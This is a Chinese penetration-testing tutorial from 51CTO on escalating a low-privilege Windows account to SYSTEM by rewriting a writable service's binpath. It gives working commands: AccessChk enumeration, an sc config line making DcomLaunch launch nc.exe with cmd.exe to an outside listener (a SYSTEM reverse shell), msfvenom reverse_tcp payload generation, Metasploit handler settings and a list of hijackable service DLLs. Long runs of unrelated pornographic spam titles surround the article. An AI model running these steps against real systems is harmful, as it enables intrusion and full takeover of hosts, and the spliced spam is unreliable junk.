精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Windows低權限進程或服務提權

原創
安全 網站安全 應用安全
在實際滲透過程中,有可能獲取了該操作系統下的一個普通用戶帳號權限,或者webshell權限,通過低權限用戶進行越權,有可能獲取系統權限;其利用原理是本文要介紹的內容。

【51CTO.com原創稿件】在實際滲透過程中,有可能獲取了該操作系統下的一個普通用戶帳號權限,或者webshell權限,通過低權限用戶進行越權,有可能獲取系統權限;其利用原理主要是通過微軟的AccessChk工具軟件,配合sc來操作服務,通過服務的重啟而得到權限。

一、AccessChk簡介及使用

1. AccessChk簡介

AccessChk是Sysinternals中的一個小工具,目前最新版本為6.1,新版本存在一些bug,在實際使用時會提示需要多個dll文件,在本案例中使用的是3.0版本,其官方網站下載地址:https://technet.microsoft.com/en-us/Sysinternals/bb664922.aspx

AccessChk主要用來檢查用戶和用戶組對文件,目錄,注冊表項,全局對象和系統服務的權限詳細情況,在實際配置過程中如果權限設置失誤,則就可以被用來提權。

2. 使用AccessChk

命令行下第一次運行需要同意一個許可,如果不想出現那個提示窗口,則可以執行“accesschk.exe /accepteula”。其主要參數如下:

  1. usage: accesschk [-s][-e][-u][-r][-w][-n][-v][[-a]|[-k]|[-p [-f] [-t]][-o [-t <object type>]][-c]|[-d]] [[-l [-i]]|[username]] <file, directory, registry key, process, service, object> 

這個命令分為三個部分accesschk是程序名;第一個參數有9個可選項[],部分可選項里還有可選參數;第二個參數是一個目標,這個目標可以是文件,目錄,注冊項,進程,服務,對象。

  • -a 名稱是Windows帳戶權限。指定“*”作為顯示所有分配給用戶的權限名稱,只有指定用戶名稱或者組時才顯示指派的權限。
  • -c 顯示服務名稱,“*”顯示所有服務。
  • -d 僅處理目錄或頂級鍵
  • -e 只顯示顯式設置完整性級別(Windows Vista和更高版本系統)
  • -f 顯示包含組和特權的完整過程令牌信息
  • -k 注冊表鍵值,例如 hklm\software
  • -i 在取消完全訪問控制列表時忽略只繼承繼承符的對象
  • -l 顯示全部訪問控制列表。添加“-I”忽略繼承ACEs
  • -n 僅顯示沒有訪問權限的對象
  • -o 名稱是對象管理器命名空間中的一個對象(默認是root)。查看一個目錄的內容,用反斜線或-S-T和對象類型指定名稱
  • -p 進程名或者PID,例如cmd.exe (使用 '*'顯示所有的進程). 加“-f ”顯示包括組和特權的所有進程令牌信息,加“-t”顯示線程。
  • -q 省略標識
  • -r 顯示對象只讀屬性
  • -s 遞歸
  • -t 對象類型篩選器
  • -u 抑制錯誤
  • -v 冗長(包括Windows Vista完整性級別)
  • -w 僅顯示具有寫訪問的對象

(1)查看用戶服務,查看管理員組、users組下所有服務:

  1. accesschk administrators -c * 
  2. accesschk users -c * 

如圖1所示,可以對某個用戶進行查看,主要用來提權用,例如查看simeon用戶具備讀寫服務器權限:

accesschk simeon -c * | find "RW" 或者accesschk simeon -cw *

查看指定用戶的服務權限

圖1查看指定用戶的服務權限

(2)查看用戶組對系統服務具備寫權限,如果有則會顯示,否則會提示“No matching objects found”。

  1. accesschk.exe -uwcqv "Authenticated Users" * 
  2. accesschk.exe -uwcqv "Administrators" * 
  3. accesschk.exe -uwcqv "Backup Operators" * 
  4. accesschk.exe -uwcqv "Distributed COM Users" * 
  5. accesschk.exe -uwcqv "Guests" * 
  6. accesschk.exe -uwcqv "HelpServicesGroup" * 
  7. accesschk.exe -uwcqv "IIS_WPG" * 
  8. accesschk.exe -uwcqv "Network Configuration Operators" * 
  9. accesschk.exe -uwcqv "Performance Monitor Users" * 
  10. accesschk.exe -uwcqv "Performance Log Users" * 
  11. accesschk.exe -uwcqv "Power Users" * 
  12. accesschk.exe -uwcqv "Print Operators" * 
  13. accesschk.exe -uwcqv "Remote Desktop Users" * 
  14. accesschk.exe -uwcqv "Replicator" * 
  15. accesschk.exe -uwcqv "TelnetClients" * 
  16. accesschk.exe -uwcqv "Users" * 

二、獲取低權限可操作服務名稱

1. 實驗環境

(1)本次實驗環境為Windows 2003 Sever SP3,用戶simeon屬于power user組,可以登錄系統。

(2)IP地址:192.168.52.175

(3)監聽服務IP:192.168.52.215

(4)nc.exe復制到c:\windows\temp目錄

2. 獲取可讀寫的服務

執行命令以下命令獲取Power Users組可以操作的服務名稱信息,如圖2所示。

  1. accesschk.exe -uwcqv "Power Users" * 

執行后顯示結果如下:

  1. RW DcomLaunch 
  2.         SERVICE_QUERY_STATUS 
  3.         SERVICE_QUERY_CONFIG 
  4.         SERVICE_CHANGE_CONFIG 
  5.         SERVICE_INTERROGATE 
  6.         SERVICE_ENUMERATE_DEPENDENTS 
  7.         READ_CONTROL 
  8. RW kdc 
  9.         SERVICE_QUERY_STATUS 
  10.         SERVICE_QUERY_CONFIG 
  11.         SERVICE_CHANGE_CONFIG 
  12.         SERVICE_INTERROGATE 
  13.         SERVICE_ENUMERATE_DEPENDENTS 
  14.         READ_CONTROL 

獲取可讀寫的服務名稱信息

圖2獲取可讀寫的服務名稱信息

3. 查詢服務詳細信息

服務名稱為“DcomLaunch”、“kdc”可以被simeon用戶進行操作。使用sc qc kdc命令查詢kdc服務的詳細信息,如圖3所示,可以看到該服務是以系統權限運行的。

獲取可讀寫的服務名稱信息

圖3查詢kdc服務詳細信息

4 .決定使用那個服務

執行命令“net start”查看系統目前已經啟動的服務,也可以使用以下命令直接獲取。如圖4所示,在啟動服務列表中發現“DCOM Server Process Launcher”服務名稱。

  1. net start | find "DCOM Server Process Launcher"  
  2. net start | find "Kerberos Key Distribution Center" 

獲取服務名稱

圖4獲取服務名稱

5. 獲取服務名稱對應的服務

使用命令“tasklist /svc”,如圖5所示,獲取“DCOM Server Process Launcher”服務名稱所對應的服務“DcomLaunch”。

獲取DcomLaunch服務信息

圖5獲取DcomLaunch服務信息

三、修改服務并獲取系統權限

1. 修改服務參數binpath值

使用sc命令對服務進行修改:

  1. sc config DcomLaunch binpath"C:\windows\temp\nc.exe -nv 192.168.52.215 4433 -e C:\WINDOWS\System32\cmd.exe" 

如圖6所示,執行命令后,顯示修改服務配置成功,再次使用sc qc DcomLaunch,顯示執行文件已經更改為:

  1. C:\windows\temp\nc.exe -nv 192.168.52.215 4433 -e C:\WINDOWS\System32\cmd.exe 

查詢服務:sc qc DcomLaunch

修改服務binpath值

圖6修改服務binpath值

2. 啟動服務

先執行 sc config DcomLaunch obj= ".\LocalSystem" password= "",然后通過命令下啟動,使用“net start DcomLaunch”命令,也可以通過services.msc服務管理器重啟該服務,如圖7所示。

重新啟動服務

圖7重新啟動服務

3. 反彈獲取服務器權限

如圖8所示,在反彈服務器中192.168.52.215監聽4433端口,成功獲取來自192.168.52.175的反彈,且為系統權限。

反彈獲取系統權限

圖8反彈獲取系統權限

4. 總結

在Winxp、Windows 2003、Windows 7 (32/64)下有一些dll文件也可以被替換:

  1. IKE and AuthIP IPsec Keying Modules (IKEEXT)    – wlbsctrl.dll 
  2. Windows Media Center Receiver Service (ehRecvr)    – ehETW.dll 
  3. Windows Media Center Scheduler Service (ehSched)  – ehETW.dll 
  4. Automatic Updates (wuauserv)    – ifsproxy.dll 
  5. Remote Desktop Help Session Manager (RDSessMgr)–SalemHook.dll 
  6. Remote Access Connection Manager (RasMan)   – ipbootp.dll 
  7. Windows Management Instrumentation (winmgmt)    – wbemcore.dll 
  8. Audio Service (STacSV)    – SFFXComm.dll SFCOM.DLL  
  9. Intel(R) Rapid Storage Technology (IAStorDataMgrSvc)  – DriverSim.dll 
  10. Juniper Unified Network Service(JuniperAccessService) – dsLogService.dll 

(1)使用msf生成exe文件

Linux msf監聽4433端口

 

  1. ./msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.52.215 lport=4433 -f exe -o /tmp/my_payload.exe 

windows下監聽4433端口

  1. ./msfvenom -p windows/shel/reverse_tcp lhost=192.168.52.215 lport=4433 -f exe -o /tmp/w.exe 

其中平臺參數(-p)可以設置為以下的一些,也可以使用msfvenom -l payload | grep 'reverse'進行查看和選擇:

  1. windows/shell/reverse_tcp 
  2. windows/x64/shell_reverse_tcp 
  3. windows/shell_reverse_tcp 
  4. windows/shell/reverse_tcp 

(2)在msf上面執行

  1. set payload windows/meterpreter/reverse_tcp 
  2. show options 
  3. set lhost 192.168.52.215 
  4. set lport 4433 
  5. run 0 

(3)將生成的/tmp/my_payload.exe按照本文上面的方法執行后即可得到反彈的webshell

 

【51CTO原創稿件,合作站點轉載請注明原文作者和出處為51CTO.com】

責任編輯:趙寧寧 來源: 51CTO.com
相關推薦

2021-01-23 09:27:32

Windows10PrivescChec微軟

2021-01-13 08:14:36

Windows提權漏洞攻擊

2016-12-12 09:11:20

2020-11-16 10:55:41

Windows

2025-05-14 18:12:33

零日漏洞漏洞網絡攻擊

2011-03-07 11:36:23

FileZillaSe

2017-04-17 18:38:03

Windows提權漏洞

2016-09-26 14:40:25

Windows內網實用命令

2018-07-05 10:44:09

Windows提權漏洞

2017-04-17 20:08:19

2023-06-11 17:24:26

2021-05-01 20:52:30

漏洞網絡安全網絡攻擊

2013-11-29 15:34:00

2016-10-31 23:00:58

MySQLMOF方法提權數據庫安全

2009-09-17 14:11:53

2023-09-11 06:59:59

2021-12-09 18:59:53

提權漏洞漏洞攻擊

2021-01-06 08:04:30

Linux方式提權

2017-03-25 20:30:15

2015-03-13 10:06:55

點贊
收藏

51CTO技術棧公眾號

日韩av毛片在线观看| 人妻内射一区二区在线视频| www日本高清| 99综合在线| 中文字幕不卡av| 无套内谢丰满少妇中文字幕| 女海盗2成人h版中文字幕| 中文字幕不卡在线观看| 高清视频一区二区三区| 久久久精品毛片| 自拍偷拍欧美专区| 亚洲人av在线影院| 国产乱淫av片| jizzjizz少妇亚洲水多| 亚洲一区二区三区四区不卡| 日韩在线导航| 欧美特黄一级视频| 久久99深爱久久99精品| 69av在线播放| 唐朝av高清盛宴| 欧美日韩中文一区二区| 亚洲第一网站免费视频| 一本色道久久亚洲综合精品蜜桃 | 亚洲网站在线播放| 日本50路肥熟bbw| 不卡一区视频| 欧洲av在线精品| 国产极品尤物在线| 乱插在线www| 国产精品视频yy9299一区| 久久国产精品一区二区三区| 国产成人精品一区二三区四区五区| 日韩精品乱码av一区二区| 久久久久亚洲精品| 欧美成人黄色网| 久久久久美女| 日韩小视频在线观看| 亚洲图片另类小说| 日本久久成人网| 亚洲高清av在线| 欧美一级片在线免费观看| 偷拍自拍亚洲| 欧美日韩高清影院| 国产精品久久久毛片| 成人日韩精品| 在线一区二区三区做爰视频网站| 国产97在线 | 亚洲| 黄色aa久久| 午夜精品福利一区二区三区蜜桃| 波多野结衣av一区二区全免费观看| 国产精品va在线观看视色| 国产精品萝li| 中国成人在线视频| 蜜芽在线免费观看| 亚洲欧洲在线观看av| japanese在线视频| 成年人黄视频在线观看| 亚洲精品国产第一综合99久久| 一区二区三区av在线| 免费在线看黄色| 亚洲欧美一区二区三区孕妇| 99re6这里有精品热视频| a视频在线免费看| 亚洲黄色片在线观看| 奇米777四色影视在线看| 女子免费在线观看视频www| 亚洲成人av免费| 大陆av在线播放| 精精国产xxxx视频在线播放| 日韩欧美亚洲一二三区| 日韩一级理论片| 欧美天堂一区| 欧美草草影院在线视频| 亚洲av永久无码精品| 亚洲男人都懂第一日本| 亚洲香蕉成人av网站在线观看| 国产又粗又长免费视频| 欧美淫片网站| 欧美一级视频在线观看| 国产亚洲欧美日韩高清| 韩国毛片一区二区三区| 国产精品一区二区不卡视频| 国模精品一区二区| 亚洲美女视频在线观看| 97超碰青青草| 狠狠久久综合| 精品国产乱码91久久久久久网站| 北岛玲一区二区| 久久国产成人精品| 久久理论片午夜琪琪电影网| 成人免费视频国产免费| 国产成人精品亚洲777人妖| 久久国产一区二区| 黄网站app在线观看| 午夜在线电影亚洲一区| 亚洲精品自拍网| 成人av动漫| 在线日韩欧美视频| 久久久久97国产| 日本欧美韩国一区三区| 99视频免费观看蜜桃视频| 黄色在线小视频| 艳妇臀荡乳欲伦亚洲一区| 毛葺葺老太做受视频| 亚洲日本一区二区三区在线| 亚洲色图50p| 免费视频一二三区| 免费日本视频一区| av免费精品一区二区三区| 国产最新视频在线观看| 午夜精品免费在线| 天天操夜夜操很很操| 精品九九在线| 91黑丝高跟在线| 国产成人精品一区二三区四区五区 | 二区在线观看| 五月天欧美精品| 久久精品视频在线观看免费| 精品国产一区探花在线观看| 久久久爽爽爽美女图片| 国产毛片一区二区三区va在线 | 麻豆91在线看| 久久精品一二三区| 黑人极品ⅴideos精品欧美棵| 欧美麻豆精品久久久久久| 在线免费观看黄色小视频| 欧美日一区二区在线观看 | 亚洲成人一品| 久久久久国产精品www| 一区二区www| 国产精品美女久久久久久2018| 精品中文字幕av| av自拍一区| 欧美激情视频一区二区三区不卡| 在线观看中文字幕2021| 国产免费观看久久| 日韩中文字幕二区| 久久不卡国产精品一区二区| 97在线观看免费高清| 狠狠人妻久久久久久综合麻豆| 亚洲激情av在线| 国产一级免费大片| 国产精品久久久久一区二区三区厕所| 国产精品高潮呻吟久久av野狼 | 911美女片黄在线观看游戏| 久久久国际精品| 国产精品久久久久9999小说| 免费久久久久久久久| 国产不卡av在线免费观看| 麻豆av电影在线观看| 一本久久a久久免费精品不卡| 青青草成人免费视频| 国产日韩欧美高清免费| 久久综合久久综合这里只有精品| 欧美gv在线| 亚洲精品日韩欧美| 久久久精品毛片| 中文字幕欧美国产| 91插插插影院| 激情文学一区| 久久国产精品 国产精品| 亚洲午夜天堂| 中文欧美在线视频| aaa一区二区| 亚洲大片在线观看| 国产色视频一区二区三区qq号| 日韩综合小视频| 一区二区不卡视频| 榴莲视频成人app| 高清欧美性猛交xxxx黑人猛交| 亚洲av成人无码久久精品老人| 91国模大尺度私拍在线视频| 久久久精品成人| 国产乱色国产精品免费视频| 久久久性生活视频| 精品国产视频| 91在线视频一区| rebdb初裸写真在线观看| 精品一区二区三区四区| 亚洲一区二区视频在线播放| 夜夜操天天操亚洲| 蜜桃无码一区二区三区| 精品综合久久久久久8888| 男女日批视频在线观看| 国产最新精品| 国产精品v欧美精品∨日韩| 亚洲wwww| 欧美大片va欧美在线播放| 深夜福利视频在线观看| 欧美群妇大交群中文字幕| 国产无遮挡又黄又爽| 国产人伦精品一区二区| 国产男女无遮挡猛进猛出| 久久久久99| 欧美一二三不卡| 国产精品中文字幕亚洲欧美| 97免费资源站| 亚洲国产尤物| 国内精品久久久久影院优| 尤物网在线观看| 亚洲精品视频在线观看视频| 国产精品丝袜黑色高跟鞋| 欧美日韩在线视频首页| caoporn91| 久久久精品免费网站| 亚洲性图第一页| 久国产精品韩国三级视频| 日韩精品视频久久| 国产精品久久久久久影院8一贰佰| 麻豆一区区三区四区产品精品蜜桃| 小说区图片区亚洲| 日韩暖暖在线视频| 国模私拍视频在线播放| www.欧美三级电影.com| 欧美视频免费一区二区三区| 亚洲大胆美女视频| 精品人妻无码一区二区| 欧美色区777第一页| 国产精品视频123| 亚洲一二三区不卡| 免费又黄又爽又色的视频| 国产精品久久久久久久岛一牛影视| 中国美女乱淫免费看视频| 国产98色在线|日韩| 国产男女无遮挡猛进猛出| 国内精品免费**视频| 天天干天天草天天| 蜜桃传媒麻豆第一区在线观看| 欧美日韩激情视频在线观看| 亚洲图片在线| 久久这里只有精品8| 亚洲免费二区| 综合久久国产| 天天久久综合| 可以免费看的黄色网址| 欧美超碰在线| 在线一区日本视频| 久久精品国产68国产精品亚洲| 日韩高清av| 国产一区二区亚洲| 色播亚洲视频在线观看| 国产一区二区三区91| 日韩一区二区三区资源| 成人毛片在线| 一区二区精品视频| 久久人人88| 免费成人深夜夜行网站视频| 亚洲不卡av不卡一区二区| 久久久成人精品一区二区三区| 一本到12不卡视频在线dvd| 亚洲五码在线观看视频| 国产精品激情电影| 日本人体一区二区| 夜夜精品视频| 日本熟妇人妻中出| 美女脱光内衣内裤视频久久影院| 国产三级三级看三级| 精品亚洲成av人在线观看| 四虎国产精品永久免费观看视频| 国产成人av一区二区三区在线| 精品人妻一区二区三区日产| 99精品桃花视频在线观看| 亚洲精品视频久久久| 国产精品三级电影| 国产大片免费看| 亚洲午夜成aⅴ人片| 精品不卡一区二区| 欧美日韩不卡在线| 亚洲AV无码乱码国产精品牛牛| 精品第一国产综合精品aⅴ| 三级在线视频| 最近2019免费中文字幕视频三| av网址在线播放| 98视频在线噜噜噜国产| 中文字幕日本一区二区| 亚洲精品欧美日韩专区| 欧美交a欧美精品喷水| 四虎一区二区| 国产精品videossex久久发布| www黄色av| 国产一区二区毛片| 人人妻人人澡人人爽人人精品| 成人免费在线播放视频| 日韩伦人妻无码| 欧美日韩精品三区| 欧美一区二区三区成人片在线| 国产亚洲精品成人av久久ww| 欧美videosex性欧美黑吊| 日本久久久久久久久久久| 久久av偷拍| 日韩精品国内| 亚洲成人直播| 亚洲免费看av| 91视频com| 福利所第一导航| 日本精品一区二区三区四区的功能| 国产精品久久久久久69| 日韩av网站在线| 成人免费网址| 国产精品高潮呻吟久久av黑人| 99久久人爽人人添人人澡| 日韩影视精品| 国产日韩亚洲| 日本精品一二三区| 国产精品久久二区二区| 天天操夜夜操视频| 日韩欧美在线网站| www.亚洲免费| 欧美壮男野外gaytube| av综合网址| 日韩一二区视频| 麻豆久久久久久久| 精品无码人妻一区| 亚洲成a人v欧美综合天堂| 国产免费久久久| 在线视频欧美日韩| 范冰冰一级做a爰片久久毛片| 99热在线国产| 午夜激情一区| www.午夜av| 欧美国产欧美亚州国产日韩mv天天看完整 | 欧美限制电影| av观看免费在线| a亚洲天堂av| 久久免费小视频| 日韩欧美中文字幕公布| a天堂在线资源| 国产精品成人va在线观看| 台湾佬综合网| av黄色在线网站| 99久久国产综合精品麻豆| 国产一级做a爱免费视频| 欧美一区二区成人6969| 麻豆传媒在线免费看| 成人av番号网| 色135综合网| 婷婷激情综合五月天| 亚洲欧洲av在线| 国产乱人乱偷精品视频| 久久九九免费视频| 青草伊人久久| 日本高清视频免费在线观看| 国产精品综合视频| 欧美日韩国产精品综合| 欧美成人艳星乳罩| 丁香花视频在线观看| 国产高清精品一区| 99精品福利视频| 中文字幕在线观看网址| 色婷婷国产精品综合在线观看| 欧美日本网站| 国产精品69av| 色婷婷色综合| 在线观看视频你懂得| 亚洲一区二区三区爽爽爽爽爽| 欧美性受xxxx狂喷水| 亲子乱一区二区三区电影| heyzo久久| 6080国产精品| 亚洲第一在线综合网站| 伦理片一区二区三区| 国产精品永久在线| 欧美成人日本| 欧美xxxxx精品| 色噜噜狠狠色综合欧洲selulu| 国产精品无码2021在线观看| 国产在线播放91| 在线看片一区| 91精品久久久久久久久久久久| 欧美日韩久久久久久| 丝袜中文在线| 欧美理论一区二区| 精品一区二区三区免费观看| 麻豆亚洲av成人无码久久精品| 日韩激情视频在线| 久久精品国产精品亚洲毛片| 欧美一级中文字幕| 久久久久99精品一区| 国产视频在线观看免费| 69**夜色精品国产69乱| 99视频精品全国免费| 国产性生活毛片| 欧美日韩你懂得| av毛片午夜不卡高**水| 五月天婷亚洲天综合网鲁鲁鲁| 国产一区二区毛片| 国产99免费视频| 久久久久久久爱| 久久精品国产大片免费观看| 日本精品一二三区| 欧美男同性恋视频网站| ****av在线网毛片| 伊人久久青草| 91视频精品在这里| va视频在线观看| 日本伊人精品一区二区三区介绍| 欧美96在线丨欧| 天天干天天操天天拍| 亚洲精品国精品久久99热| 日本成人手机在线|